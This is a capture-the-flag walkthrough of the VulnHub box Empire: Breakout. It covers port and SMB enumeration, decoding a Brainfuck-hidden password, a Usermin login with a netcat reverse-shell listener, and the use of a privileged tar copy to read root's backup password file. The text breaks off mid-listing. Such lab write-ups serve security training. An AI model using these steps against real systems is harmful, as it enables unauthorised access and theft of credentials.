EMPIRE: BREAKOUT

Published: 2023-09-17 20:53:20  Author: 林中亻

Download: https://download.vulnhub.com/empire/02-Breakout.zip

Description

Difficulty: Easy
This box was created to be an Easy box, but it can be Medium if you get lost.
For hints discord Server ( https://discord.gg/7asvAhCEhe )

1: Information gathering

Discovering the target IP with netdiscover

 Currently scanning: Finished!   |   Screen View: Unique Hosts
  
 4 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 240
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.1.1     50:d2:f5:7c:60:ea      2     120  Beijing Xiaomi Mobile Software Co., Ltd
 192.168.1.223   08:00:27:99:43:a0      1      60  PCS Systemtechnik GmbH
 192.168.1.238   52:96:66:d8:a6:d9      1      60  Unknown vendor

Port scanning

Full port scan

$ nmap -p- --min-rate 10000 192.168.1.223
Starting Nmap 7.80 ( https://nmap.org ) at 2023-05-25 23:23 EDT
Nmap scan report for 192.168.1.223
Host is up (0.00030s latency).
Not shown: 65530 closed ports
PORT      STATE SERVICE
80/tcp    open  http
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
10000/tcp open  snet-sensor-mgmt
20000/tcp open  dnp

Nmap done: 1 IP address (1 host up) scanned in 1.13 seconds

Version detection and --script=default scan

$ nmap -p80,139,445,10000,20000 -sV -sC 192.168.1.223
Starting Nmap 7.80 ( https://nmap.org ) at 2023-05-25 23:27 EDT
Nmap scan report for 192.168.1.223
Host is up (0.00051s latency).

PORT      STATE SERVICE     VERSION
80/tcp    open  http        Apache httpd 2.4.51 ((Debian))
|_http-server-header: Apache/2.4.51 (Debian)
|_http-title: Apache2 Debian Default Page: It works
139/tcp   open  netbios-ssn Samba smbd 4.6.2
445/tcp   open  netbios-ssn Samba smbd 4.6.2
10000/tcp open  http        MiniServ 1.981 (Webmin httpd)
|_http-server-header: MiniServ/1.981
|_http-title: 200 — Document follows
20000/tcp open  http        MiniServ 1.830 (Webmin httpd)
|_http-server-header: MiniServ/1.830
|_http-title: 200 — Document follows

Host script results:
|_nbstat: NetBIOS name: BREAKOUT, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2023-05-26T03:27:21
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 41.40 seconds

--script=vuln scan

$ nmap -p80,139,445,10000,20000 --script=vuln 192.168.1.223
Starting Nmap 7.80 ( https://nmap.org ) at 2023-05-25 23:29 EDT
Nmap scan report for 192.168.1.223
Host is up (0.00063s latency).

PORT      STATE SERVICE
80/tcp    open  http
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.1.223
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://192.168.1.223:80/manual/ru/index.html
|     Form id: 
|     Form action: https://www.google.com/search
|     
|     Path: http://192.168.1.223:80/manual/es/index.html
|     Form id: 
|     Form action: https://www.google.com/search
|     
|     Path: http://192.168.1.223:80/manual/ko/index.html
|     Form id: 
|     Form action: https://www.google.com/search
|     
|     Path: http://192.168.1.223:80/manual/pt-br/index.html
|     Form id: 
|     Form action: https://www.google.com/search
|     
|     Path: http://192.168.1.223:80/manual/en/index.html
|     Form id: 
|     Form action: https://www.google.com/search
|     
|     Path: http://192.168.1.223:80/manual/zh-cn/index.html
|     Form id: 
|     Form action: https://www.google.com/search
|     
|     Path: http://192.168.1.223:80/manual/ja/index.html
|     Form id: 
|     Form action: https://www.google.com/search
|     
|     Path: http://192.168.1.223:80/manual/fr/index.html
|     Form id: 
|     Form action: https://www.google.com/search
|     
|     Path: http://192.168.1.223:80/manual/tr/index.html
|     Form id: 
|     Form action: https://www.google.com/search
|     
|     Path: http://192.168.1.223:80/manual/de/index.html
|     Form id: 
|     Form action: https://www.google.com/search
|     
|     Path: http://192.168.1.223:80/manual/da/index.html
|     Form id: 
|_    Form action: https://www.google.com/search
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|_  /manual/: Potentially interesting folder
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
139/tcp   open  netbios-ssn
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
445/tcp   open  microsoft-ds
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
10000/tcp open  snet-sensor-mgmt
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-vuln-cve2006-3392: 
|   VULNERABLE:
|   Webmin File Disclosure
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2006-3392
|       Webmin before 1.290 and Usermin before 1.220 calls the simplify_path function before decoding HTML.
|       This allows arbitrary files to be read, without requiring authentication, using "..%01" sequences
|       to bypass the removal of "../" directory traversal sequences.
|       
|     Disclosure date: 2006-06-29
|     References:
|       http://www.exploit-db.com/exploits/1997/
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3392
|_      http://www.rapid7.com/db/modules/auxiliary/admin/webmin/file_disclosure
|_sslv2-drown: 
20000/tcp open  dnp
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_sslv2-drown: 

Host script results:
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: ERROR: Server returned less data than it was supposed to (one or more fields are missing); aborting [9]
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: ERROR: Server returned less data than it was supposed to (one or more fields are missing); aborting [9]

Nmap done: 1 IP address (1 host up) scanned in 52.47 seconds

Directory brute-forcing

$ gobuster -u "http://192.168.1.223/" -w /wordlist/directory-list-2.3-medium.txt -x php,txt,html

=====================================================
Gobuster v2.0.1              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://192.168.1.223/
[+] Threads      : 10
[+] Wordlist     : /wordlist/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,307,403
[+] Extensions   : html,php,txt
[+] Timeout      : 10s
=====================================================
2023/05/25 23:31:31 Starting gobuster
=====================================================
/index.html (Status: 200)
/manual (Status: 301)
/server-status (Status: 403)
=====================================================
2023/05/25 23:32:46 Finished
=====================================================

whatweb on the two MiniServ ports (Webmin on 10000, Usermin on 20000)

$ whatweb https://192.168.1.223:10000/
https://192.168.1.223:10000/ [200 OK] Cookies[redirect,testing], Country[RESERVED][ZZ], HTML5, HTTPServer[MiniServ/1.981], HttpOnly[redirect,testing], IP[192.168.1.223], PasswordField[pass], Script, Title[Login to Webmin], UncommonHeaders[auth-type,content-security-policy,x-content-type-options,x-no-links], X-Frame-Options[SAMEORIGIN]

$ whatweb https://192.168.1.223:20000/
https://192.168.1.223:20000/ [200 OK] Cookies[redirect,testing], Country[RESERVED][ZZ], HTML5, HTTPServer[MiniServ/1.830], HttpOnly[redirect,testing], IP[192.168.1.223], PasswordField[pass], Script, Title[Login to Usermin], UncommonHeaders[auth-type,content-security-policy,x-content-type-options,x-no-links], X-Frame-Options[SAMEORIGIN]

At the bottom of the home page there is an HTML comment; I show part of the output below.

$ curl http://192.168.1.223/
<!--
don't worry no one will get here, it's safe to share with you my access. Its encrypted :)

++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>++++++++++++++++.++++.>>+++++++++++++++++.----.<++++++++++.-----------.>-----------.++++.<<+.>-.--------.++++++++++++++++++++.<------------.>>---------.<<++++++.++++++.


-->

Decoding the Brainfuck program with https://ctf.bugku.com/tool/brainfuck :

++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>++++++++++++++++.++++.>>+++++++++++++++++.----.<++++++++++.-----------.>-----------.++++.<<+.>-.--------.++++++++++++++++++++.<------------.>>---------.<<++++++.++++++.

.2uqPEfj3D<P'a-3
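The comment is a Brainfuck program, and pasting a credential into a third-party web tool is not something a practitioner should need to do. As an added example (not part of the original writeup), the following small Python Brainfuck interpreter decodes the program from the page offline. The program literal is copied verbatim from the HTML comment above; everything else is this example's own code.

```python
"""Minimal Brainfuck interpreter used to decode the Breakout home-page comment
offline (added example, not from the original writeup)."""

# The Brainfuck program, copied verbatim from the HTML comment on port 80.
HOMEPAGE_COMMENT = "++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>++++++++++++++++.++++.>>+++++++++++++++++.----.<++++++++++.-----------.>-----------.++++.<<+.>-.--------.++++++++++++++++++++.<------------.>>---------.<<++++++.++++++."


def _match_brackets(code: str) -> dict:
    """Pre-compute the jump table for '[' and ']' so each loop jump is O(1)."""
    stack, jumps = [], {}
    for pos, ch in enumerate(code):
        if ch == "[":
            stack.append(pos)
        elif ch == "]":
            if not stack:
                raise ValueError(f"unmatched ']' at offset {pos}")
            start = stack.pop()
            jumps[start], jumps[pos] = pos, start
    if stack:
        raise ValueError(f"unmatched '[' at offset {stack[-1]}")
    return jumps


def run_brainfuck(code: str, stdin: bytes = b"", tape_size: int = 30000) -> str:
    """Execute a Brainfuck program and return everything it printed.

    Cells are 8-bit and wrap modulo 256 (the classic semantics). Characters
    outside the eight Brainfuck commands are ignored as comments, so the
    program can be pasted straight out of an HTML comment.
    """
    code = "".join(ch for ch in code if ch in "<>+-.,[]")
    jumps = _match_brackets(code)
    tape = bytearray(tape_size)
    ptr = pc = 0
    inp = iter(stdin)
    out = bytearray()
    while pc < len(code):
        op = code[pc]
        if op == ">":
            ptr += 1
            if ptr >= tape_size:
                raise IndexError("tape pointer ran off the right end")
        elif op == "<":
            ptr -= 1
            if ptr < 0:
                raise IndexError("tape pointer ran off the left end")
        elif op == "+":
            tape[ptr] = (tape[ptr] + 1) & 0xFF
        elif op == "-":
            tape[ptr] = (tape[ptr] - 1) & 0xFF
        elif op == ".":
            out.append(tape[ptr])
        elif op == ",":
            tape[ptr] = next(inp, 0)  # EOF reads as 0
        elif op == "[" and tape[ptr] == 0:
            pc = jumps[pc]  # skip the loop body when the cell is zero
        elif op == "]" and tape[ptr] != 0:
            pc = jumps[pc]  # jump back to the matching '[' while non-zero
        pc += 1
    return out.decode("latin-1")


def decode_homepage_comment() -> str:
    """Decode the Breakout comment; returns the string shown in the writeup."""
    return run_brainfuck(HOMEPAGE_COMMENT)


if __name__ == "__main__":
    print(decode_homepage_comment())
```

The opening loop `++++++++++[>+>+++>+++++++>++++++++++<<<<-]` seeds cells 1..4 with 10, 30, 70 and 100, and the rest of the program nudges those cells up or down and prints them, which is why the decoded text comes out as ASCII one character at a time.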

Enumerating SMB users

$ enum4linux 192.168.1.223
WARNING: polenum.py is not in your path.  Check that package is installed and your PATH is sane.
WARNING: ldapsearch is not in your path.  Check that package is installed and your PATH is sane.
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Fri May 26 00:15:30 2023

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 192.168.1.223
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ===================================================== 
|    Enumerating Workgroup/Domain on 192.168.1.223    |
 ===================================================== 
[+] Got domain/workgroup name: WORKGROUP

 ============================================= 
|    Nbtstat Information for 192.168.1.223    |
 ============================================= 
Looking up status of 192.168.1.223
	BREAKOUT        <00> -         B <ACTIVE>  Workstation Service
	BREAKOUT        <03> -         B <ACTIVE>  Messenger Service
	BREAKOUT        <20> -         B <ACTIVE>  File Server Service
	..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser
	WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
	WORKGROUP       <1d> -         B <ACTIVE>  Master Browser
	WORKGROUP       <1e> - <GROUP> B <ACTIVE>  Browser Service Elections

	MAC Address = 00-00-00-00-00-00

 ====================================== 
|    Session Check on 192.168.1.223    |
 ====================================== 
[+] Server 192.168.1.223 allows sessions using username '', password ''

 ============================================ 
|    Getting domain SID for 192.168.1.223    |
 ============================================ 
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup

 ======================================= 
|    OS information on 192.168.1.223    |
 ======================================= 
Use of uninitialized value $os_info in concatenation (.) or string at /usr/bin/enum4linux line 464.
[+] Got OS info for 192.168.1.223 from smbclient: 
[+] Got OS info for 192.168.1.223 from srvinfo:
	BREAKOUT       Wk Sv PrQ Unx NT SNT Samba 4.13.5-Debian
	platform_id     :	500
	os version      :	6.1
	server type     :	0x809a03

 ============================== 
|    Users on 192.168.1.223    |
 ============================== 
Use of uninitialized value $users in print at /usr/bin/enum4linux line 874.
Use of uninitialized value $users in pattern match (m//) at /usr/bin/enum4linux line 877.

Use of uninitialized value $users in print at /usr/bin/enum4linux line 888.
Use of uninitialized value $users in pattern match (m//) at /usr/bin/enum4linux line 890.

 ========================================== 
|    Share Enumeration on 192.168.1.223    |
 ========================================== 

	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	IPC$            IPC       IPC Service (Samba 4.13.5-Debian)
SMB1 disabled -- no workgroup available

[+] Attempting to map shares on 192.168.1.223
//192.168.1.223/print$	Mapping: DENIED, Listing: N/A
//192.168.1.223/IPC$	[E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*

 ===================================================== 
|    Password Policy Information for 192.168.1.223    |
 ===================================================== 
[E] Dependent program "polenum.py" not present.  Skipping this check.  Download polenum from http://labs.portcullis.co.uk/application/polenum/


 =============================== 
|    Groups on 192.168.1.223    |
 =============================== 

[+] Getting builtin groups:

[+] Getting builtin group memberships:

[+] Getting local groups:

[+] Getting local group memberships:

[+] Getting domain groups:

[+] Getting domain group memberships:

 ======================================================================== 
|    Users on 192.168.1.223 via RID cycling (RIDS: 500-550,1000-1050)    |
 ======================================================================== 
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-1683874020-4104641535-3793993001
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-500 *unknown*\*unknown* (8)
S-1-5-32-501 *unknown*\*unknown* (8)
S-1-5-32-502 *unknown*\*unknown* (8)
S-1-5-32-503 *unknown*\*unknown* (8)
S-1-5-32-504 *unknown*\*unknown* (8)
S-1-5-32-505 *unknown*\*unknown* (8)
S-1-5-32-506 *unknown*\*unknown* (8)
S-1-5-32-507 *unknown*\*unknown* (8)
S-1-5-32-508 *unknown*\*unknown* (8)
S-1-5-32-509 *unknown*\*unknown* (8)
S-1-5-32-510 *unknown*\*unknown* (8)
S-1-5-32-511 *unknown*\*unknown* (8)
S-1-5-32-512 *unknown*\*unknown* (8)
S-1-5-32-513 *unknown*\*unknown* (8)
S-1-5-32-514 *unknown*\*unknown* (8)
S-1-5-32-515 *unknown*\*unknown* (8)
S-1-5-32-516 *unknown*\*unknown* (8)
S-1-5-32-517 *unknown*\*unknown* (8)
S-1-5-32-518 *unknown*\*unknown* (8)
S-1-5-32-519 *unknown*\*unknown* (8)
S-1-5-32-520 *unknown*\*unknown* (8)
S-1-5-32-521 *unknown*\*unknown* (8)
S-1-5-32-522 *unknown*\*unknown* (8)
S-1-5-32-523 *unknown*\*unknown* (8)
S-1-5-32-524 *unknown*\*unknown* (8)
S-1-5-32-525 *unknown*\*unknown* (8)
S-1-5-32-526 *unknown*\*unknown* (8)
S-1-5-32-527 *unknown*\*unknown* (8)
S-1-5-32-528 *unknown*\*unknown* (8)
S-1-5-32-529 *unknown*\*unknown* (8)
S-1-5-32-530 *unknown*\*unknown* (8)
S-1-5-32-531 *unknown*\*unknown* (8)
S-1-5-32-532 *unknown*\*unknown* (8)
S-1-5-32-533 *unknown*\*unknown* (8)
S-1-5-32-534 *unknown*\*unknown* (8)
S-1-5-32-535 *unknown*\*unknown* (8)
S-1-5-32-536 *unknown*\*unknown* (8)
S-1-5-32-537 *unknown*\*unknown* (8)
S-1-5-32-538 *unknown*\*unknown* (8)
S-1-5-32-539 *unknown*\*unknown* (8)
S-1-5-32-540 *unknown*\*unknown* (8)
S-1-5-32-541 *unknown*\*unknown* (8)
S-1-5-32-542 *unknown*\*unknown* (8)
S-1-5-32-543 *unknown*\*unknown* (8)
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
S-1-5-32-1000 *unknown*\*unknown* (8)
S-1-5-32-1001 *unknown*\*unknown* (8)
S-1-5-32-1002 *unknown*\*unknown* (8)
S-1-5-32-1003 *unknown*\*unknown* (8)
S-1-5-32-1004 *unknown*\*unknown* (8)
S-1-5-32-1005 *unknown*\*unknown* (8)
S-1-5-32-1006 *unknown*\*unknown* (8)
S-1-5-32-1007 *unknown*\*unknown* (8)
S-1-5-32-1008 *unknown*\*unknown* (8)
S-1-5-32-1009 *unknown*\*unknown* (8)
S-1-5-32-1010 *unknown*\*unknown* (8)
S-1-5-32-1011 *unknown*\*unknown* (8)
S-1-5-32-1012 *unknown*\*unknown* (8)
S-1-5-32-1013 *unknown*\*unknown* (8)
S-1-5-32-1014 *unknown*\*unknown* (8)
S-1-5-32-1015 *unknown*\*unknown* (8)
S-1-5-32-1016 *unknown*\*unknown* (8)
S-1-5-32-1017 *unknown*\*unknown* (8)
S-1-5-32-1018 *unknown*\*unknown* (8)
S-1-5-32-1019 *unknown*\*unknown* (8)
S-1-5-32-1020 *unknown*\*unknown* (8)
S-1-5-32-1021 *unknown*\*unknown* (8)
S-1-5-32-1022 *unknown*\*unknown* (8)
S-1-5-32-1023 *unknown*\*unknown* (8)
S-1-5-32-1024 *unknown*\*unknown* (8)
S-1-5-32-1025 *unknown*\*unknown* (8)
S-1-5-32-1026 *unknown*\*unknown* (8)
S-1-5-32-1027 *unknown*\*unknown* (8)
S-1-5-32-1028 *unknown*\*unknown* (8)
S-1-5-32-1029 *unknown*\*unknown* (8)
S-1-5-32-1030 *unknown*\*unknown* (8)
S-1-5-32-1031 *unknown*\*unknown* (8)
S-1-5-32-1032 *unknown*\*unknown* (8)
S-1-5-32-1033 *unknown*\*unknown* (8)
S-1-5-32-1034 *unknown*\*unknown* (8)
S-1-5-32-1035 *unknown*\*unknown* (8)
S-1-5-32-1036 *unknown*\*unknown* (8)
S-1-5-32-1037 *unknown*\*unknown* (8)
S-1-5-32-1038 *unknown*\*unknown* (8)
S-1-5-32-1039 *unknown*\*unknown* (8)
S-1-5-32-1040 *unknown*\*unknown* (8)
S-1-5-32-1041 *unknown*\*unknown* (8)
S-1-5-32-1042 *unknown*\*unknown* (8)
S-1-5-32-1043 *unknown*\*unknown* (8)
S-1-5-32-1044 *unknown*\*unknown* (8)
S-1-5-32-1045 *unknown*\*unknown* (8)
S-1-5-32-1046 *unknown*\*unknown* (8)
S-1-5-32-1047 *unknown*\*unknown* (8)
S-1-5-32-1048 *unknown*\*unknown* (8)
S-1-5-32-1049 *unknown*\*unknown* (8)
S-1-5-32-1050 *unknown*\*unknown* (8)
[+] Enumerating users using SID S-1-5-21-1683874020-4104641535-3793993001 and logon username '', password ''
S-1-5-21-1683874020-4104641535-3793993001-500 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-501 BREAKOUT\nobody (Local User)
S-1-5-21-1683874020-4104641535-3793993001-502 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-503 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-504 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-505 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-506 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-507 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-508 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-509 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-510 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-511 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-512 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-513 BREAKOUT\None (Domain Group)
S-1-5-21-1683874020-4104641535-3793993001-514 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-515 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-516 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-517 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-518 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-519 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-520 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-521 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-522 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-523 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-524 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-525 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-526 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-527 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-528 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-529 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-530 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-531 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-532 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-533 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-534 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-535 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-536 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-537 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-538 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-539 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-540 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-541 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-542 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-543 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-544 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-545 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-546 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-547 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-548 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-549 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-550 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1000 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1001 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1002 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1003 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1004 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1005 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1006 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1007 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1008 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1009 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1010 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1011 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1012 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1013 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1014 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1015 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1016 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1017 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1018 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1019 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1020 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1021 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1022 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1023 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1024 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1025 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1026 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1027 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1028 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1029 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1030 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1031 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1032 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1033 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1034 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1035 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1036 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1037 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1038 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1039 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1040 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1041 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1042 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1043 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1044 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1045 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1046 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1047 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1048 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1049 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1050 *unknown*\*unknown* (8)
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\cyber (Local User)

 ============================================== 
|    Getting printer info for 192.168.1.223    |
 ============================================== 
No printers returned.


enum4linux complete on Fri May 26 00:15:40 2023

2: Getting a shell

Log in with these credentials on port 20000 (Usermin):

username: cyber
password: .2uqPEfj3D<P'a-3
Then spawn a reverse shell back to the attacking machine.

ok

$ nc -lvvp 1234
listening on [any] 1234 ...
192.168.1.223: inverse host lookup failed: Unknown host
connect to [192.168.1.171] from (UNKNOWN) [192.168.1.223] 39648
bash: cannot set terminal process group (1728): Inappropriate ioctl for device
bash: no job control in this shell
cyber@breakout:~$ 

User flag

cyber@breakout:~$ cat user.txt
cat user.txt
3mp!r3{You_Manage_To_Break_To_My_Secure_Access}

3: Privilege escalation

tar -cf creates a tar archive. The home directory contains a root-owned copy of tar (./tar) that is able to read /var/backups/.old_pass.bak, a file with mode 0600 owned by root; archiving that file with ./tar and extracting the archive with the system tar produces a copy owned by cyber.

cyber@breakout:~$ ls -la /var/backups/
ls -la /var/backups/
total 28
drwxr-xr-x  2 root root  4096 May 25 23:37 .
drwxr-xr-x 14 root root  4096 Oct 19  2021 ..
-rw-r--r--  1 root root 12732 Oct 19  2021 apt.extended_states.0
-rw-------  1 root root    17 Oct 20  2021 .old_pass.bak
cyber@breakout:~$ ls -l
ls -l
total 1272
-rw-r--r-- 1 cyber cyber 765823 May 26 00:40 linpeas.sh
-rwxr-xr-x 1 root  root  531928 Oct 19  2021 tar
-rw-r--r-- 1 cyber cyber     48 Oct 19  2021 user.txt
cyber@breakout:~$ ./tar -cf pass.tar /var/backups/.old_pass.bak
./tar -cf pass.tar /var/backups/.old_pass.bak
./tar: Removing leading `/' from member names
cyber@breakout:~$ ls
ls
linpeas.sh  pass.tar  tar  user.txt
cyber@breakout:~$ tar -xf pass.tar
tar -xf pass.tar
cyber@breakout:~$ ls
ls
linpeas.sh  pass.tar  tar  user.txt  var
cyber@breakout:~$ cd var
cd var
cyber@breakout:~/var$ ls
ls
backups
cyber@breakout:~/var$ cd backups
cd backups
cyber@breakout:~/var/backups$ ls
ls
cyber@breakout:~/var/backups$ ls -la
ls -la
total 12
drwxr-xr-x 2 cyber cyber 4096 May 26 04:16 .
